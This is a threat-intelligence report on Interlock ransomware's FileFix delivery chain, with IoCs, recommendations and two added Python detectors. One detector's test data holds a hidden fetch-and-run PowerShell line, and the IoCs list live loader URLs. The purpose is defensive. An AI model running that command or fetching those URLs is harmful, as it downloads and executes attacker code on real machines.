Executive Summary
A newly observed wave of cyberattacks involving the Interlock ransomware has revealed a dangerous evolution in how attackers gain access to systems. Security researchers have identified that Interlock has adopted a sophisticated technique known as “FileFix”, a deceptive method that tricks users into executing malicious code without triggering any visible warnings. This change in strategy reflects the growing trend among cybercriminals to rely on social engineering rather than traditional exploit-based approaches.
The FileFix method masks malicious instructions as harmless file paths and prompts users to interact with Windows components like File Explorer. Once activated, the attack silently installs a remote access trojan (RAT) that spies on the system, collects sensitive data, and prepares the environment for a ransomware payload. Notably, Interlock has previously targeted high-profile institutions, and this new tactic makes their attacks harder to detect and block. The evolution of this method signals a concerning development in ransomware delivery mechanisms and underscores the increasing need for user awareness and robust endpoint defenses.
Chapter 1: Threat Overview
Interlock ransomware has recently adopted a stealthier delivery method known as FileFix, which relies heavily on user deception rather than exploiting software vulnerabilities. This approach marks a shift in how the ransomware is propagated, using social engineering techniques to bypass conventional defenses. Delivered through compromised websites and a web injector called KongTuke, the malware chain culminates in the installation of a remote access trojan (RAT) that enables data exfiltration, system control, and eventual ransomware deployment.

Initial Access via FileFix
Interlock ransomware has incorporated a stealthy payload delivery mechanism known as FileFix, an evolution of the widely abused ClickFix method. Originally demonstrated by security researcher mr.d0x, FileFix weaponizes legitimate Windows UI components—such as File Explorer and HTA (HTML Applications)—to trick users into executing malicious code disguised as harmless file paths. Unlike traditional methods that rely on exploits or malicious attachments, FileFix focuses on deceiving the user through clipboard manipulation and interface spoofing.
Payload Delivery via KongTuke Web Injector
The initial infection vector in recent Interlock campaigns involves compromised websites hosting the KongTuke injector (also referred to as LandUpdate808). Victims are led through fake CAPTCHA-style verification steps, followed by a prompt to paste clipboard content into the Run dialog or File Explorer. This technique, consistent with ClickFix/FileFix tactics, executes obfuscated PowerShell commands that download and launch malware.
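The execution pattern described above leaves a distinctive lineage: a script host started directly by explorer.exe (which hosts both the address bar and the Run dialog) with a command line carrying a download cradle and disguise padding. The following detection heuristic is an added example, not code from the report or from any referenced project; it assumes the published FileFix lure format (the command followed by a `#` comment holding a fake document path) and runs over constructed process-creation records.

```python
import re
from typing import NamedTuple

class ProcessEvent(NamedTuple):
    # Constructed process-creation record; fields mirror Sysmon Event ID 1 / EDR telemetry.
    parent_image: str
    image: str
    command_line: str

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}
# Cradle vocabulary typical of clipboard-delivered PowerShell: fetch, decode, execute.
DOWNLOAD_CUES = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\birm\b|invoke-restmethod|"
    r"invoke-expression|\biex\b|frombase64string|-e(nc|ncodedcommand)?\b", re.I)
# Assumed lure format: the published FileFix demo hides the command behind a '#' comment that
# carries a plausible document path, padded with spaces so only the path shows in the address bar.
FAKE_PATH_COMMENT = re.compile(r"#\s*[A-Za-z]:\\[^\r\n]*\.(?:docx?|xlsx?|pdf|txt)\b", re.I)

def filefix_indicators(ev: ProcessEvent) -> list[str]:
    """Reasons an event resembles FileFix/ClickFix execution (empty list = nothing notable)."""
    child = ev.image.rsplit("\\", 1)[-1].lower()
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    if child not in SCRIPT_HOSTS:
        return []
    reasons = []
    # Explorer hosts the address bar and the Run dialog, so this is the paste lineage.
    if parent == "explorer.exe":
        reasons.append("script host spawned by explorer.exe")
    if DOWNLOAD_CUES.search(ev.command_line):
        reasons.append("download/decode/execute cradle in command line")
    if FAKE_PATH_COMMENT.search(ev.command_line):
        reasons.append("trailing '#' comment carrying a document path")
    if re.search(r"\s{20,}", ev.command_line):
        reasons.append("long whitespace run pushing the command out of view")
    return reasons

def is_filefix_like(ev: ProcessEvent) -> bool:
    """Alert on Explorer lineage combined with at least one disguise or cradle cue."""
    reasons = filefix_indicators(ev)
    return "script host spawned by explorer.exe" in reasons and len(reasons) >= 2

# Constructed samples: a FileFix-style paste (placeholder URL), a user opening cmd from Explorer,
# and a scheduled-task style PowerShell run with no Explorer lineage.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLES = [
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 'powershell.exe -w h -c "iex (iwr https://example.invalid/a)"' + " " * 40 + r"# C:\company\HR\Policy.pdf"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", PS, r"powershell.exe -File C:\Scripts\inventory.ps1"),
]
```

A user who merely opens a command prompt from Explorer trips only the lineage cue and is not flagged; the alert requires the lineage plus a cradle or disguise indicator.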
Interlock RAT Variants (Node.js and PHP)
The attack chain culminates in the deployment of an Interlock Remote Access Trojan (RAT). Early campaigns in May used a Node.js-based variant, while campaigns in June and July transitioned to a PHP-based version. This malware is fetched from infrastructure such as trycloudflare[.]com and executed without triggering standard Windows security prompts. Once active, the RAT harvests system and network information, exfiltrating it in structured JSON format to an external command and control (C2) server.
Post-Infection Capabilities
Following installation, the Interlock RAT enables the threat actor to:
● Enumerate Active Directory structures
● Search for backups
● Scan local and network directories
● Investigate domain controllers
● Establish persistence through Windows Registry run keys
● Execute remote commands and facilitate lateral movement via RDP
Ransomware Deployment and Victim Profile
Interlock ransomware was first observed in September 2024 and has been linked to high-profile breaches, including Texas Tech University, DaVita, and Kettering Health. While earlier campaigns relied on ClickFix, the switch to FileFix indicates an intentional pivot to stealthier and more deceptive techniques. The campaign is still active and may expand, given the ease with which the FileFix method bypasses user defenses.
Chapter 2: Indicators of Compromise (IoCs)
File Hashes
Windows Interlock ransomware:
● a26f0a2da63a838161a7d335aaa5e4b314a232acc15dcabdb6f6dbec63cda642
FreeBSD Interlock ransomware:
● 28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f
● e86bb8361c436be94b0901e5b39db9b6666134f23cce1e5581421c2981405cb1
● f00a7652ad70ddb6871eeef5ece0972cf68f3d9a6b7acfbffd33f82558ab50e
Backdoor (pre-ransomware) sample:
● e9ff4d40aeec2ff9d2886c7e7aea7634d8997a14ca3740645fd3101808cc187b
Domains
JS or RAT download domains:
Compromised web loader links:
● andrixdesign.com/kzz/c1ub.zip
● .js loaders: talentohc.com/js.php, telback.com/5t5y.js
Command and Control (C2) Endpoints
MITRE ATT&CK Techniques
● T1204.002 – User Execution: Malicious File
● T1059.001 – Command and Scripting Interpreter: PowerShell
● T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys
● T1027 – Obfuscated Files or Information
● T1071.001 – Application Layer Protocol: Web Protocols
● T1082 – System Information Discovery
● T1018 – Remote System Discovery
● T1482 – Domain Trust Discovery
● T1003 – OS Credential Dumping
● T1210 – Exploitation of Remote Services
● T1021.001 – Remote Services: Remote Desktop Protocol
Chapter 3: Recommendation
1. Educate users on FileFix-style attacks
Train employees to recognize deceptive prompts asking them to paste text into File Explorer or the Run dialog. Emphasize that legitimate processes should never require manual input of file paths copied from unknown websites.
2. Block clipboard-driven attack vectors
Implement endpoint protection mechanisms or group policies to monitor or restrict the execution of clipboard-injected PowerShell commands. This reduces exposure to FileFix and similar social engineering tactics.
3. Filter access to compromised or suspicious web sources
Monitor and restrict traffic to domains like trycloudflare.com or known loader URLs used by KongTuke injectors. Web proxy or DNS filtering solutions can help intercept connections to suspicious infrastructure.
4. Audit PowerShell usage across endpoints
Continuously monitor PowerShell execution logs, especially for commands involving downloads or obfuscated syntax. Alert on abnormal or user-initiated PowerShell activity that bypasses standard workflows.
5. Detect registry-based persistence
Scan for unauthorized or abnormal entries under common persistence paths such as HKCU\Software\Microsoft\Windows\CurrentVersion\Run. This helps identify post-infection mechanisms used by Interlock RAT.
6. Review user privileges and restrict RDP access
Limit administrative privileges and enforce RDP access controls to reduce lateral movement possibilities, as the Interlock RAT is capable of using RDP post-infection.
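Recommendation 5 calls for reviewing Run keys. The audit below is an added example, not code from the report or from any referenced project: it parses `reg query` style output for the HKCU Run key and flags values that launch the interpreters tied to this chain (PowerShell, and the Node.js and PHP RAT variants) from user-writable locations or with hidden-window flags. The sample registry output, paths and value names are constructed.

```python
import re
from typing import NamedTuple

class RunKeyValue(NamedTuple):
    name: str
    data: str  # command string stored in the Run value

# Value line as printed by `reg query`: <indent><name><spaces>REG_xx<spaces><data>
REG_LINE = re.compile(r"^\s+(\S.*?)\s{2,}(REG_[A-Z_]+)\s{2,}(.*)$")

def parse_reg_query(text: str) -> list[RunKeyValue]:
    """Turn `reg query ...\\Run` output into records; only string-typed values hold commands."""
    values = []
    for line in text.splitlines():
        m = REG_LINE.match(line)
        if m and m.group(2) in ("REG_SZ", "REG_EXPAND_SZ"):
            values.append(RunKeyValue(m.group(1), m.group(3).strip()))
    return values

# Interpreters the report ties to the chain (PowerShell, the Node.js and PHP RAT variants) plus
# common script hosts; user-writable locations; flags that hide execution; script payloads.
INTERPRETERS = re.compile(r"\b(powershell|pwsh|node|php|php-cgi|mshta|wscript|cscript|cmd)\.exe\b", re.I)
USER_WRITABLE = re.compile(r"\\(appdata|temp|programdata|users\\public|downloads)\\", re.I)
HIDDEN_FLAGS = re.compile(r"-(w|windowstyle)\s+h(idden)?\b|-e(nc|ncodedcommand)?\s|-nop\b", re.I)
SCRIPT_PAYLOAD = re.compile(r"\.(js|php|ps1|hta|vbs|bat)\b", re.I)
CHECKS = [
    (INTERPRETERS, "launches a script interpreter"),
    (USER_WRITABLE, "references a user-writable path"),
    (HIDDEN_FLAGS, "hidden-window, no-profile or encoded-command flags"),
    (SCRIPT_PAYLOAD, "script file as payload"),
]

def run_key_findings(v: RunKeyValue) -> list[str]:
    """Heuristic reasons a Run value deserves review (empty list = nothing notable)."""
    return [reason for rx, reason in CHECKS if rx.search(v.data)]

def suspicious_values(text: str) -> dict[str, list[str]]:
    """Value name -> findings for every entry that trips at least two heuristics."""
    return {v.name: f for v in parse_reg_query(text) if len(f := run_key_findings(v)) >= 2}

# Constructed sample in the shape of `reg query` output: two legitimate entries and two that
# resemble Node.js- and PowerShell-based persistence (paths and names are invented).
SAMPLE_REG_OUTPUT = r"""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    SecurityHealth    REG_EXPAND_SZ    %windir%\System32\SecurityHealthSystray.exe
    ChromeUpdate    REG_SZ    "C:\Users\alice\AppData\Roaming\nodejs\node.exe" C:\Users\alice\AppData\Roaming\nodejs\app.js
    Updater    REG_SZ    powershell.exe -w hidden -nop -File C:\ProgramData\svc\run.ps1
"""
```

Requiring two independent heuristics keeps legitimate per-user software that lives under AppData (the OneDrive entry) out of the result while both invented persistence entries are reported.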